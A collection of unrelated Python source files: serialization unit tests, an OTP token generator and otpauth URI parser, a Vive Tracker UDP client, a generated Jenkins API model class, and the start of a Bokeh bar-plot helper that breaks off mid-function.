        _ObjectA.__module__, _ObjectA.__name__)
    self.assertFalse(hasattr(_ObjectA, dynamic_definitions_attr_name))
    attributes = _ObjectA._GetDefinedAttributes()
    expected_attributes = {'v': int}
    self.assertDictEqual(expected_attributes, attributes)
    self.assertTrue(hasattr(_ObjectA, dynamic_definitions_attr_name))
    cached_attributes = getattr(_ObjectA, dynamic_definitions_attr_name)
    self.assertDictEqual(expected_attributes, cached_attributes)
    attributes = _ObjectA._GetDefinedAttributes()
    self.assertTrue(attributes is cached_attributes)

  def testToSerializable(self):
    obj_a = _ObjectA()
    obj_a.v = 1
    obj_b = _ObjectB()
    obj_b.v = {'key': 'value'}
    obj_b.a = obj_a
    data = obj_b.ToSerializable()
    expected_data = {'a': {'v': 1}, 'v': {'key': 'value'}}
    self.assertDictEqual(expected_data, data)

  def testToSerializableForNoneValue(self):
    obj_a = _ObjectA(v=None)
    self.assertDictEqual({'v': None}, obj_a.ToSerializable())

  def testFromSerializableNone(self):
    obj_b = _ObjectB.FromSerializable(None)
    self.assertIsNone(obj_b)

  def testFromSerializable(self):
    data = {'a': {'v': 1}, 'v': {'key': 'value'}}
    obj_b = _ObjectB.FromSerializable(data)
    self.assertDictEqual({'key': 'value'}, obj_b.v)
    self.assertEqual(1, obj_b.a.v)

  def testFromSerializableAssertionOnList(self):
    with self.assertRaises(structured_object.DeserializationError):
      _ObjectA.FromSerializable(['v'])

  def testFromSerializableAssertionOnUndefinedAttribute(self):
    with self.assertRaises(structured_object.DeserializationError):
      _ObjectA.FromSerializable({'undefined': 1})

  def testFromSerializableUndefinedAttributeAllowed(self):
    # Set the class-level opt-in flag, and make sure it is removed again so
    # the other tests still see the default strict behavior.
    _ObjectA._ignore_unknown_attributes = True
    try:
      o = _ObjectA.FromSerializable({'undefined': 1, 'v': 1})
      self.assertEqual(1, o.v)
    finally:
      del _ObjectA._ignore_unknown_attributes

  def testFromSerializableAssertionOnMissingAttributeValue(self):
    obj_a = _ObjectA.FromSerializable({})
    self.assertIsNone(obj_a.v)

  def testNotEqualForDifferentObjectType(self):
    obj_a = _ObjectA(v=1)
    self.assertNotEqual(obj_a, 'not a string object')

  def testNotEqualForAttributeValue(self):
    obj_a1 = _ObjectA(v=1)
    obj_a2 = _ObjectA(v=3)
    self.assertNotEqual(obj_a1, obj_a2)

  def testEqualForSameValues(self):
    data = {'a': {'v': 1}, 'v': {'key': 'value'}}
    obj_b1 = _ObjectB.FromSerializable(data)
    obj_b2 = _ObjectB(v={'key': 'value'}, a=_ObjectA(v=1))
    self.assertEqual(obj_b1, obj_b2)

  def testMultipeInstanceOfTheSameClass(self):
    obj_a1 = _ObjectA()
    obj_a1.v = 3
    obj_a2 = _ObjectA()
    obj_a2.v = 5
    self.assertEqual(3, obj_a1.v)
    self.assertEqual(5, obj_a2.v)

  def testSettingPrivateAttribute(self):
    obj_a = _ObjectA()
    obj_a._private_attribute = 30
    self.assertEqual(30, obj_a._private_attribute)

  def testUndefinedPublicAttribute(self):
    with self.assertRaises(AssertionError):
      obj_a = _ObjectA()
      setattr(obj_a, 'undefined', 'this should trigger an assertion')

  def testTypeValidationInSettingValue(self):
    with self.assertRaises(AssertionError):
      obj_a = _ObjectA()
      obj_a.v = 'not a string value'

  def testTypeValidationAcceptNoneAsValue(self):
    obj_a = _ObjectA()
    obj_a.v = None
    self.assertIsNone(obj_a.v)

  def testCustomizedTypeValidationForBuiltInType(self):
    f = _Future()
    obj_a = _ObjectA(
        type_validation_func=lambda _, x: isinstance(x, _Future), v=f)
    d = obj_a.ToSerializable()
    self.assertTrue(d['v'] is f)
    obj_a.v = 10
    d = obj_a.ToSerializable()
    self.assertEqual(10, d['v'])
    with self.assertRaises(AssertionError):
      obj_a.v = 'this wrong type should trigger an assertion'

  def testCustomizedTypeValidationForStructuredObject(self):
    f = _Future()
    obj_b = _ObjectB(
        type_validation_func=lambda _, x: isinstance(x, _Future),
        v={'a': 'b'},
        a=f)
    d = obj_b.ToSerializable()
    self.assertDictEqual({'a': 'b'}, d['v'])
    self.assertTrue(d['a'] is f)
    obj_b.a = _ObjectA(v=1)
    d = obj_b.ToSerializable()
    self.assertDictEqual({'v': 1}, d['a'])
    with self.assertRaises(AssertionError):
      obj_b.a = 'this wrong type should trigger an assertion'

  def testAccessingPrivateAttribute(self):
    obj_a = _ObjectA()
    self.assertEqual(10, obj_a._private_attribute)

  def testTypedDict(self):
    d = _DictOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    d['a'] = obj_a
    self.assertEqual(obj_a, d['a'])

  def testTypedDictWithPrimitiveTypes(self):
    d = _DictOfInt()
    d['a'] = 1
    self.assertEqual(1, d['a'])

  def testTypedDictOtherType(self):
    with self.assertRaises(Exception):
      d = _DictOfObjectA()
      d[1] = 'a'

  def testTypedDictDel(self):
    d = _DictOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    d['a'] = obj_a
    del d['a']
    self.assertIsNone(d.get('a'))

  def testTypedDictIter(self):
    d = _DictOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    d['a'] = obj_a
    for value in d.values():
      self.assertTrue(isinstance(value, _ObjectA))

  def testTypedDictLen(self):
    d = _DictOfObjectA()
    self.assertEqual(0, len(d))

  def testTypedList(self):
    l = _ListOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    l.append(obj_a)
    obj_a2 = _ObjectA()
    obj_a2.v = 1
    l[0] = obj_a2
    self.assertEqual(1, l[0].v)

  def testTypedListWithPrimitiveTypes(self):
    l = _ListOfStr()
    l.append('str1')
    l[0] = 'str2'
    self.assertEqual('str2', l[0])

  def testTypedListDel(self):
    l = _ListOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    l.extend([obj_a])
    del l[0]
    # assertEquals was removed in Python 3.12; use assertEqual.
    self.assertEqual(0, len(l))

  def testTypedListInsert(self):
    l = _ListOfObjectA()
    obj_a = _ObjectA()
    obj_a.v = 3
    l.insert(0, obj_a)
    self.assertEqual(l[0], obj_a)

  def testTypedListInsertOtherType(self):
    with self.assertRaises(Exception):
      l = _ListOfObjectA()
      l.insert(0, 'b')

  def testComplexTypesToSerializable(self):
    obj_a1 = _ObjectA()
    obj_a1.v = 1
    obj_a2 = _ObjectA()
    obj_a2.v = 2
    obj_c = _ObjectC()
    obj_c.da = _DictOfObjectA()
    obj_c.da['a1'] = obj_a1
    obj_c.da['a2'] = obj_a2
    obj_c.la = _ListOfObjectA()
    obj_c.la.append(obj_a2)
    obj_c.la.insert(0, obj_a1)
    obj_c.d = _DictOfInt()
    obj_c.d['a1'] = 1
    obj_c.d['a2'] = 2
    obj_c.l = _ListOfStr()
    obj_c.l.extend(['a', 'b'])
    expected_dict = {
        'da': {
            'a1': {
                'v': 1
            },
            'a2': {
                'v': 2
            }
        },
        'la': [{
            'v': 1
        }, {
            'v': 2
        }],
        'd': {
            'a1': 1,
            'a2': 2
        },
        'l': ['a', 'b']
    }
    self.assertEqual(expected_dict, obj_c.ToSerializable())

  def testComplexTypesFromSerializable(self):
    data_dict = {
        'da': {
            'a1': {
                'v': 1
            },
            'a2': {
                'v': 2
            }
        },
        'la': [{
            'v': 1
        }, {
            'v': 2
        }],
        'd': {
            'a1': 1,
            'a2': 2
        },
        'l': ['a', 'b']
    }
    obj_c = _ObjectC.FromSerializable(data_dict)
    self.assertEqual(data_dict, obj_c.ToSerializable())

  def testBaseSerializableObjectEqual(self):
    data_dict = {
        'da': {
            'a1': {
                'v': 1
            },
            'a2': {
                'v': 2
            }
        },
        'la': [{
            'v': 1
        }, {
            'v': 2
        }],
        'd': {
            'a1': 1,
            'a2': 2
        },
        'l': ['a', 'b']
    }
    obj_c1 = _ObjectC.FromSerializable(data_dict)
    obj_c2 = _ObjectC.FromSerializable(data_dict)
    self.assertEqual(obj_c1, obj_c2)

  def testBaseSerializableObjectNotEqual(self):
    obj_a1 = _ObjectA()
    obj_a1.v = 1
    obj_a2 = _ObjectA()
    obj_a2.v = 2
    da = _DictOfObjectA()
    da['a1'] = obj_a1
    da['a2'] = obj_a2
    la = _ListOfObjectA()
    la.append(obj_a1)
    la.append(obj_a2)
    self.assertTrue(da != la)

  def testTypedDictFromSerializableNone(self):
    self.assertIsNone(_DictOfObjectA.FromSerializable(None))

  def testTypedListFromSerializableNone(self):
    self.assertIsNone(_ListOfObjectA.FromSerializable(None))
|
# otp/token.py
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import hashlib
import hmac
import logging
import math
import time
from enum import Enum
logger = logging.getLogger(__name__)
class TokenCode:
    """A one-time code together with the validity window it belongs to."""

    def __init__(self, code, start, end):
        self.start = start
        self.end = end
        self.code = code
        self.window = end - start

    @property
    def progress(self):
        """
        Returns the progress made until the expiry of the token
        , between 0 and 1
        """
        now = time.time()
        if now >= self.end:
            return 1
        elapsed = now - self.start
        return elapsed / self.window

    @property
    def remaining(self):
        """
        Returns the duration in seconds in that token is still valid
        """
        return math.ceil((1 - self.progress) * self.window)
class TokenType(Enum):
    """Supported OTP flavours: counter-based (HOTP) and time-based (TOTP)."""
    HOTP, TOTP = range(2)

    @staticmethod
    def fromValue(value):
        """Map the otpauth URI authority ('hotp'/'totp') to a TokenType, else None."""
        mapping = {'hotp': TokenType.HOTP, 'totp': TokenType.TOTP}
        return mapping.get(value)

    def __str__(self):
        return self.name.lower()
class Token:
    """A single OTP token: issuer/user identity, shared secret and parameters."""

    def __init__(self, issuer, secret, **kwargs):
        """
        Args:
            issuer: name of the service that issued this token.
            secret: shared secret as raw bytes (NOT base32-encoded).

        Keyword Args:
            index: storage index of the token.
            type: token type, 'totp' (default) or 'hotp' (or a TokenType).
            user: account name the token belongs to.
            period: TOTP time step in seconds (default 30).
            algorithm: HMAC hash name (default 'SHA-1').
            digits: number of digits in generated codes (default 6).
        """
        self.issuer = issuer
        self.secret = secret
        self._index = kwargs.get('index')
        self.type = kwargs.get('type', 'totp')
        self.user = kwargs.get('user')
        self.period = kwargs.get('period', 30)
        self.algorithm = kwargs.get('algorithm', 'SHA-1')
        self.digits = kwargs.get('digits', 6)

    @property
    def uri(self):
        """
        otpauth://TYPE/LABEL?PARAMS where
        LABEL is issuer:user
        """
        from urllib.parse import urlunsplit, urlencode
        # b32encode returns bytes; decode so the query string does not end
        # up containing the textual repr "b'...'".
        query = {'secret': base64.b32encode(self.secret).decode('ascii'),
                 'period': self.period,
                 'algorithm': self.algorithm, 'digits': self.digits}
        return urlunsplit(('otpauth', str(self.type),
                           self.issuer + ':' + self.user,
                           urlencode(query), None))

    @property
    def id(self):
        return f'{self.issuer}:{self.user}'

    def generateCode(self, timestamp=None):
        """Generate the code for *timestamp* (default: now) as a TokenCode.

        Implements RFC 4226 dynamic truncation over an HMAC-SHA1 digest of
        the time-step counter.
        NOTE(review): the digest is always SHA-1; self.algorithm is not yet
        honoured here -- confirm before supporting SHA256/SHA512 tokens.
        """
        start = time.time() if timestamp is None else timestamp
        counter = int(start / self.period)
        logger.debug('counter=%s', counter)
        mac = hmac.new(self.secret, counter.to_bytes(8, 'big'), hashlib.sha1)
        digest = mac.digest()
        logger.debug("%s:digest=%s", counter, " ".join([f"{b:02X}" for b in digest]))
        # Dynamic truncation (RFC 4226 section 5.3): the low nibble of the
        # last byte selects a 4-byte window in the digest.
        offset = digest[len(digest) - 1] & 0x0F
        logger.debug('%s:offset=%s', counter, offset)
        # mask MSB to avoid sign ambiguity
        msb = digest[offset] & 0x7F
        for i in range(1, 4):
            msb <<= 8
            msb |= digest[offset + i] & 0xFF
        code = msb % (10 ** self.digits)
        # Zero-pad to the configured length (was hard-coded to 6 digits,
        # which broke 7- and 8-digit tokens).
        code = f"{code:0{self.digits}d}"
        return TokenCode(code, counter * self.period,
                         (counter + 1) * self.period)

    @classmethod
    def fromUri(cls, uri):
        """Build a Token from a parsed otpauth:// URI.

        Raises InvalidTokenUriError for any malformed or unsupported field.
        """
        from urllib.parse import parse_qs
        scheme = uri.scheme
        if scheme != 'otpauth':
            raise InvalidTokenUriError('Invalid scheme', scheme)
        token_type = TokenType.fromValue(uri.netloc)
        if not token_type:
            raise InvalidTokenUriError()
        label = uri.path
        if not label:
            raise InvalidTokenUriError()
        issuer, user = label[1:].split(':')
        params = parse_qs(uri.query)
        secret = params.get('secret')
        secret = None if not secret else secret[0]
        if not secret:
            raise InvalidTokenUriError()
        try:
            # The URI carries the secret base32-encoded (see `uri` above);
            # store raw bytes. Re-pad, since URIs often drop the '='s.
            secret = base64.b32decode(secret + '=' * (-len(secret) % 8),
                                      casefold=True)
        except ValueError:
            raise InvalidTokenUriError()
        period = params.get('period')
        try:
            period = 30 if not period else int(period[0])
        except ValueError:
            raise InvalidTokenUriError()
        digits = params.get('digits')
        try:
            digits = 6 if not digits else int(digits[0])
            if digits not in (6, 7, 8):
                raise ValueError
        except ValueError:
            raise InvalidTokenUriError()
        issuer_q = params.get('issuer')
        try:
            if issuer_q:
                if issuer and issuer_q[0] != issuer:
                    raise ValueError
                else:
                    issuer = issuer_q[0]
        except ValueError:
            raise InvalidTokenUriError()
        algorithm = params.get('algorithm')
        try:
            algorithm = 'SHA1' if not algorithm else algorithm[0]
            if algorithm not in ('SHA1', 'SHA256', 'SHA512'):
                raise ValueError
        except ValueError:
            raise InvalidTokenUriError()
        # Was: Token(token_type, issuer, user, secret, period, algorithm,
        # digits), which does not match __init__(issuer, secret, **kwargs)
        # and raised TypeError. Pass everything by keyword instead.
        return cls(issuer, secret, type=token_type, user=user,
                   period=period, algorithm=algorithm, digits=digits)

    @classmethod
    def fromString(cls, string):
        """Parse an otpauth:// URI supplied as a (possibly percent-encoded) string."""
        from urllib.parse import urlparse, unquote
        return cls.fromUri(urlparse(unquote(string)))

    def __str__(self):
        return f'{self.issuer}:{self.user}'
class InvalidTokenUriError(Exception):
    """Raised when an otpauth:// URI is malformed or has unsupported values."""

    def __init__(self, msg=None, value=None):
        self.args = (msg, value)
        self.msg = msg
        self.value = value
|
"""
Defines Vive Tracker server. This script should run as is.
Example usage:
python vive_tracker_client.py --debug True
For Vive Tracker Server implementation, please see
https://github.com/wuxiaohua1011/ROAR_Desktop/blob/main/ROAR_Server/vive_tracker_server.py
"""
import socket
import sys
import logging
from typing import Optional
try:
from ROAR_Jetson.vive.models import ViveTrackerMessage
except:
from models import ViveTrackerMessage
import json
import time
from typing import Tuple
import argparse
from pathlib import Path
class ViveTrackerClient:
    """
    Defines a vive tracker client that constantly polls message from (HOST, PORT)
    and update its self.latest_tracker_message public variable

    Other interacting script can initialize this ViveTracker Client as a sub-process and access its
    latest_tracker_message for tracker data.

    multiple vive tracker can be used at the same time by initializing multiple clients with different `tracker_name`
    """

    def __init__(self, host: str, port: int, tracker_name: str,
                 time_out: float = 1, buffer_length: int = 1024,
                 should_record: bool = False,
                 output_file_path: Path = Path("../data/RFS_Track.txt")):
        """
        Args:
            host: Server's LAN Host address. (Ex: 192.168.1.7)
            port: Server's LAN Port address. (Ex: 8000)
            tracker_name: Tracker name (Ex: tracker_1)
            time_out: time out for socket's receive. Will reset socket on timeout
            buffer_length: maximum length of data it can receive at once
            should_record: enable recording of data
            output_file_path: output file's path
        """
        self.host = host
        self.port = port
        self.tracker_name: str = tracker_name
        self.time_out = time_out
        self.buffer_length = buffer_length
        # UDP socket used both to send the tracker-name request and to receive
        # the server's reply.
        self.socket: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 20)
        self.socket.settimeout(self.time_out)
        # Most recently parsed update; None until the first valid message arrives.
        self.latest_tracker_message: Optional[ViveTrackerMessage] = None
        self.should_record = should_record
        self.output_file_path = output_file_path
        self.output_file = None
        if self.should_record:
            # Create the output directory on demand before opening the file.
            if self.output_file_path.parent.exists() is False:
                self.output_file_path.parent.mkdir(exist_ok=True, parents=True)
            self.output_file = self.output_file_path.open('w')
        # Counts received updates; used to subsample recording (1 in 10).
        self.count = 0
        self.logger = logging.getLogger(f"Vive Tracker Client [{self.tracker_name}]")
        self.logger.info("Tracker Initialized")

    def update(self):
        """
        This client will send to the server the name of the tracker it is requesting
        It will receive that tracker's information.

        Updates the self.latest_vive_tracker_message field
        Record self.latest_vive_tracker_message if needed

        Returns:
            None
        """
        self.logger.info(f"Start Subscribing to [{self.host}:{self.port}] "
                         f"for [{self.tracker_name}] Vive Tracker Updates")
        while True:
            try:
                # Request-by-name: the server replies with that tracker's state.
                _ = self.socket.sendto(self.tracker_name.encode(), (self.host, self.port))
                data, addr = self.socket.recvfrom(self.buffer_length)  # buffer size is 1024 bytes
                parsed_message, status = self.parse_message(data.decode())
                if status:
                    self.update_latest_tracker_message(parsed_message=parsed_message)
                    if self.should_record:
                        # Write only every 10th sample to keep the file small.
                        if self.count % 10 == 0:
                            self.output_file.write(f'{self.latest_tracker_message.x},'
                                                   f'{self.latest_tracker_message.y},'
                                                   f'{self.latest_tracker_message.z},'
                                                   f'{self.latest_tracker_message.roll},'
                                                   f'{self.latest_tracker_message.pitch},'
                                                   f'{self.latest_tracker_message.yaw}\n')
                        self.count += 1
                else:
                    self.logger.error(f"Failed to parse incoming message [{data.decode()}]")
            except socket.timeout:
                self.logger.error("Timed out")
            except ConnectionResetError as e:
                self.logger.error(f"Error: {e}. Retrying")
            except OSError as e:
                # Deliberately swallowed so transient network errors do not
                # kill the polling loop (see the disabled log line below).
                pass
                # self.logger.error(e)
            except KeyboardInterrupt:
                exit(1)
            except Exception as e:
                self.logger.debug(e)

    def run_threaded(self):
        # Placeholder hook; polling happens in update(). Presumably kept to
        # satisfy a part/threading interface — TODO confirm against callers.
        pass

    def shutdown(self):
        """
        Safely shuts down the client and its connections

        Returns:
            None
        """
        self.socket.close()
        if self.output_file is not None:
            self.output_file.close()

    def update_latest_tracker_message(self, parsed_message):
        """
        Given Vive Tracker message in JSON format, load json into dictionary format,
        parse the tracker message using PyDantic

        Assign self.latest_vive_tracker_message as the parsed result

        Args:
            parsed_message: tracker message in json format

        Returns:
            None
        """
        try:
            # json.loads is applied twice: the payload is JSON-encoded twice
            # (first pass yields a JSON string, second yields the dict).
            d = json.loads(json.loads(parsed_message))
            vive_tracker_message = ViveTrackerMessage.parse_obj(d)
            # Ignore updates addressed to a different tracker.
            if vive_tracker_message.device_name == self.tracker_name:
                self.latest_tracker_message = vive_tracker_message
                self.logger.debug(self.latest_tracker_message)
        except Exception as e:
            self.logger.error(f"Error: {e} \nMaybe it is related to unable to parse buffer [{parsed_message}]. ")

    @staticmethod
    def parse_message(received_message: str) -> Tuple[str, bool]:
        """
        Parse the received message by ensuring that it start and end with special "handshake" characters

        Args:
            received_message: string format of the received bytes

        Returns:
            parsed received message in string and whether the parsing was successful
        """
        # The payload is framed as "&...\r"; anything outside the frame (or a
        # message missing either delimiter) is rejected.
        start = received_message.find("&")
        end = received_message.find("\r")
        if start == -1 or end == -1:
            return "", False
        else:
            return received_message[start + 1:end], True

    @staticmethod
    def initialize_socket() -> socket.socket:
        # Build a UDP socket with address reuse and multicast options set.
        soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        soc.settimeout(3)
        soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
        except AttributeError:
            pass  # Some systems don't support SO_REUSEPORT
        soc.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
        soc.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
        return soc
def str2bool(v):
    """Interpret *v* as a boolean for use as an argparse `type=` callable.

    Accepts actual bools unchanged; otherwise matches common textual
    spellings case-insensitively. Raises ArgumentTypeError on anything else.
    """
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--debug", default=False, help="debug flag", type=str2bool)
    # Fixed copy-pasted help text: this flag enables recording, not debugging.
    parser.add_argument("--collect", default=False, help="record tracker data to disk", type=str2bool)
    args = parser.parse_args()
    # str2bool returns a real bool, so plain truthiness is sufficient
    # (comparing with `is True` was redundant).
    logging.basicConfig(format='%(asctime)s|%(name)s|%(levelname)s|%(message)s',
                        datefmt="%H:%M:%S",
                        level=logging.DEBUG if args.debug else logging.INFO)
    # Hard-coded LAN address of the Vive Tracker server.
    HOST, PORT = "192.168.1.19", 8000
    client = ViveTrackerClient(host=HOST, port=PORT, tracker_name="tracker_1",
                               output_file_path=Path("../data/RFS_Track.txt"),
                               should_record=args.collect)
    # Blocks forever, polling the server for tracker updates.
    client.update()
# coding: utf-8
"""
<NAME>
Jenkins API clients generated from Swagger / Open API specification # noqa: E501
The version of the OpenAPI document: 1.1.2-pre.0
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class InputStepImpl(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps attribute name -> declared OpenAPI type; to_dict() iterates this.
    openapi_types = {
        '_class': 'str',
        'links': 'InputStepImpllinks',
        'id': 'str',
        'message': 'str',
        'ok': 'str',
        'parameters': 'list[StringParameterDefinition]',
        'submitter': 'str'
    }

    # Maps attribute name -> JSON key used in the serialized payload.
    attribute_map = {
        '_class': '_class',
        'links': '_links',
        'id': 'id',
        'message': 'message',
        'ok': 'ok',
        'parameters': 'parameters',
        'submitter': 'submitter'
    }

    def __init__(self, _class=None, links=None, id=None, message=None, ok=None, parameters=None, submitter=None, local_vars_configuration=None):  # noqa: E501
        """InputStepImpl - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration

        # Backing fields for the properties below. `__class` is name-mangled
        # to `_InputStepImpl__class`, which keeps it distinct from the
        # builtin `__class__` attribute.
        self.__class = None
        self._links = None
        self._id = None
        self._message = None
        self._ok = None
        self._parameters = None
        self._submitter = None
        self.discriminator = None

        # Only assign attributes that were explicitly provided, so unset
        # fields stay None rather than overwriting defaults.
        if _class is not None:
            self._class = _class
        if links is not None:
            self.links = links
        if id is not None:
            self.id = id
        if message is not None:
            self.message = message
        if ok is not None:
            self.ok = ok
        if parameters is not None:
            self.parameters = parameters
        if submitter is not None:
            self.submitter = submitter

    @property
    def _class(self):
        """Gets the _class of this InputStepImpl.  # noqa: E501

        :return: The _class of this InputStepImpl.  # noqa: E501
        :rtype: str
        """
        return self.__class

    @_class.setter
    def _class(self, _class):
        """Sets the _class of this InputStepImpl.

        :param _class: The _class of this InputStepImpl.  # noqa: E501
        :type _class: str
        """
        self.__class = _class

    @property
    def links(self):
        """Gets the links of this InputStepImpl.  # noqa: E501

        :return: The links of this InputStepImpl.  # noqa: E501
        :rtype: InputStepImpllinks
        """
        return self._links

    @links.setter
    def links(self, links):
        """Sets the links of this InputStepImpl.

        :param links: The links of this InputStepImpl.  # noqa: E501
        :type links: InputStepImpllinks
        """
        self._links = links

    @property
    def id(self):
        """Gets the id of this InputStepImpl.  # noqa: E501

        :return: The id of this InputStepImpl.  # noqa: E501
        :rtype: str
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this InputStepImpl.

        :param id: The id of this InputStepImpl.  # noqa: E501
        :type id: str
        """
        self._id = id

    @property
    def message(self):
        """Gets the message of this InputStepImpl.  # noqa: E501

        :return: The message of this InputStepImpl.  # noqa: E501
        :rtype: str
        """
        return self._message

    @message.setter
    def message(self, message):
        """Sets the message of this InputStepImpl.

        :param message: The message of this InputStepImpl.  # noqa: E501
        :type message: str
        """
        self._message = message

    @property
    def ok(self):
        """Gets the ok of this InputStepImpl.  # noqa: E501

        :return: The ok of this InputStepImpl.  # noqa: E501
        :rtype: str
        """
        return self._ok

    @ok.setter
    def ok(self, ok):
        """Sets the ok of this InputStepImpl.

        :param ok: The ok of this InputStepImpl.  # noqa: E501
        :type ok: str
        """
        self._ok = ok

    @property
    def parameters(self):
        """Gets the parameters of this InputStepImpl.  # noqa: E501

        :return: The parameters of this InputStepImpl.  # noqa: E501
        :rtype: list[StringParameterDefinition]
        """
        return self._parameters

    @parameters.setter
    def parameters(self, parameters):
        """Sets the parameters of this InputStepImpl.

        :param parameters: The parameters of this InputStepImpl.  # noqa: E501
        :type parameters: list[StringParameterDefinition]
        """
        self._parameters = parameters

    @property
    def submitter(self):
        """Gets the submitter of this InputStepImpl.  # noqa: E501

        :return: The submitter of this InputStepImpl.  # noqa: E501
        :rtype: str
        """
        return self._submitter

    @submitter.setter
    def submitter(self, submitter):
        """Sets the submitter of this InputStepImpl.

        :param submitter: The submitter of this InputStepImpl.  # noqa: E501
        :type submitter: str
        """
        self._submitter = submitter

    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}

        def convert(x):
            # Recursively serialize nested models; pass `serialize` through
            # only when the nested to_dict accepts it (more than `self`).
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            # When serializing, emit the JSON key from attribute_map instead
            # of the Python attribute name.
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, InputStepImpl):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, InputStepImpl):
            return True

        return self.to_dict() != other.to_dict()
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
from bokeh.models import ColumnDataSource, FixedTicker, HoverTool
from bokeh.plotting import figure
from bokeh.plotting.figure import Figure
def style(plot: Figure) -> None:
    """
    Apply the shared look-and-feel to the given plot: a black outline and a
    faint grey grid.

    :param plot: Figure object to style.
    """
    plot.outline_line_color = "black"
    grid = plot.grid
    grid.grid_line_alpha = 0.2
    grid.grid_line_color = "grey"
    grid.grid_line_width = 0.2
def bar_plot(
    plot_source: ColumnDataSource,
    orientation: Optional[str] = "vertical",
    figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
    plot_kwargs: Optional[Union[Dict[str, Any], None]] = None,
    tooltips: Optional[Union[None, List[Tuple[str, str]]]] = None,
) -> Figure:
    """
    Create and style a bar plot using the given `plot_source`.

    :param plot_source: Bokeh `ColumnDataSource` object. Expected to provide
        "x", "y" and "tick_labels" columns plus the quad coordinates
        ("left", "top", "right", "bottom") used below — TODO confirm against
        callers.
    :param orientation: Can be one of "vertical" or "horizontal".
    :param figure_kwargs: Figure options to pass to the Bokeh figure object.
    :param plot_kwargs: Plot options to pass to the Bokeh figure object.
    :param tooltips: A list of tuples Bokeh can use for hover tips.
    :returns plot: The bar plot using Bokeh as the backend.
    """
    if figure_kwargs is None:
        figure_kwargs = {}
    if plot_kwargs is None:
        plot_kwargs = {}
    x = np.array(plot_source.data["x"])
    y = np.array(plot_source.data["y"])
    tick_labels = plot_source.data["tick_labels"]
    # Pad the value-axis range by 20% on each side.
    padding = 0.2
    range_ = []
    if orientation == "vertical":
        # Log-style bounds anchor the range start near 1 rather than scaling
        # the data minimum (which could be <= 0).
        y_range_start = 1 - padding
        y_range_end = (1 + padding) * y.max()
        log_bounds = [y_range_start, y_range_end]
        minimum = (1 - padding) * y.min()
        maximum = (1 + padding) * y.max()
        no_log_bounds = [minimum, maximum]
        # A caller-supplied "y_axis_type" (e.g. "log") selects the log bounds.
        range_ = (
            log_bounds
            if figure_kwargs.get("y_axis_type", None) is not None
            else no_log_bounds
        )
    elif orientation == "horizontal":
        x_range_start = 1 - padding
        x_range_end = (1 + padding) * x.max()
        log_bounds = [x_range_start, x_range_end]
